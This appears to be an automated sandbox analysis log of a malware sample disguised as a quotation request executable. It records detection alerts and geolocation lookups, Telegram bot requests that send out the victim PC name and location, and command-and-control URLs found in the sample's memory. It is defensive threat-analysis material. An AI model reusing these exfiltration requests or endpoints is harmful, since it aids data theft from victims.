                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPE
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
                Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownDNS query: name: checkip.dyndns.org
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49724 -> 158.101.44.242:80
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49734 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49760 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49735 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49745 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49740 -> 188.114.96.3:443
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:16 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 20 Nov 2024 08:33:21 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000B.00000002.2160677274.000000000259B000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20a
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003250000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003241000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlBsq
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000434000.00000040.00000400.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.00000000030DE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E6F000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E96000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002E29000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000314E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003175000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003108000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.75$
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4524536731.0000000003DD3000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: jnqeRRexnD.exe, 0000000E.00000002.4523754774.00000000040B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003281000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.000000000327C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBsq
